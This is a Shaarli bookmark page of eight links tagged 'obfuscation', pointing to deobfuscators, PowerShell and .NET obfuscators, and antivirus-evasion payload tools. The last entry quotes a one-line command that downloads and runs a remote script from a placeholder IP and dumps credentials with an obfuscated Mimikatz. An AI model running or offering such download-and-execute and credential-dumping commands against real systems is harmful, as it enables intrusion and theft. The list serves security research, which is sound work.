776 links
  • Shared Bookmarks
  • Home
  • Login
  • RSS Feed
  • ATOM Feed
  • Tag cloud
  • Picture wall
  • Daily
Links per page: 20 50 100
8 results tagged obfuscation x
  • thumbnail
    de4dot/de4dot: .NET deobfuscator and unpacker.
    August 13, 2025 at 7:30:58 PM UTC * - permalink -
    QRCode
    - https://github.com/de4dot/de4dot
    dotnet cs confuserex obfuscation deobfuscation
  • thumbnail
    burrowers/garble: Obfuscate Go builds
    November 19, 2021 at 7:32:00 PM UTC - permalink -
    QRCode
    - https://github.com/burrowers/garble
    garble bypass obfuscation golang go
  • thumbnail
    xforcered/InvisibilityCloak: Proof-of-concept obfuscation toolkit for C# post-exploitation tools
    November 3, 2021 at 10:51:36 AM UTC - permalink -
    QRCode
    - https://github.com/xforcered/InvisibilityCloak
    bypass obfuscation c# tooling
  • thumbnail
    klezVirus/chameleon: PowerShell Script Obfuscator
    June 3, 2021 at 1:29:19 PM UTC - permalink -
    QRCode
    - https://github.com/klezVirus/chameleon
    obfuscation powershell
  • thumbnail
    GitHub - Charterino/AsStrongAsFuck: A console obfuscator for .NET assemblies.
    March 20, 2021 at 1:17:44 AM UTC - permalink -
    QRCode
    - https://github.com/Charterino/AsStrongAsFuck
    obfuscation c#
  • thumbnail
    Embedding EXE files into PowerShell scripts |
    May 25, 2020 at 8:24:03 PM UTC - permalink -
    QRCode
    - https://truesecdev.wordpress.com/2016/03/15/embedding-exe-files-into-powershell-scripts/
    powershell obfuscation binary av bypass evasion
  • thumbnail
    GitHub - Mr-Un1k0d3r/DKMC: DKMC - Dont kill my cat - Malicious payload evasion tool
    April 15, 2020 at 2:40:14 PM UTC - permalink -
    QRCode
    - https://github.com/Mr-Un1k0d3r/DKMC
    payload evasion payloads tool macro phishing obfuscation
  • thumbnail
    geoda: Running an Obfuscated version of Mimikatz in Memory to bypass AntiVirus and other host based controls

    https://github.com/danielbohannon/Invoke-Obfuscation

    PS > Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation
    Invoke-Obfuscation > set SCRIPTBLOCK "iEX (New-Object System.Net.WebClient).DownloadString('https://<IP>:<PORT>/obfuscated.ps1'); Invoke-Mimidogz -DumpCred
    ...
    February 20, 2019 at 2:24:52 PM UTC - permalink -
    QRCode
    - https://blog.geoda-security.com/2018/05/running-obfuscated-version-of-mimikatz.html
    powershell mimikatz postexploitation postex post exploitation obfuscation kiwi
Links per page: 20 50 100
Shaarli - The personal, minimalist, super fast, database-free, bookmarking service by the Shaarli community - Help/documentation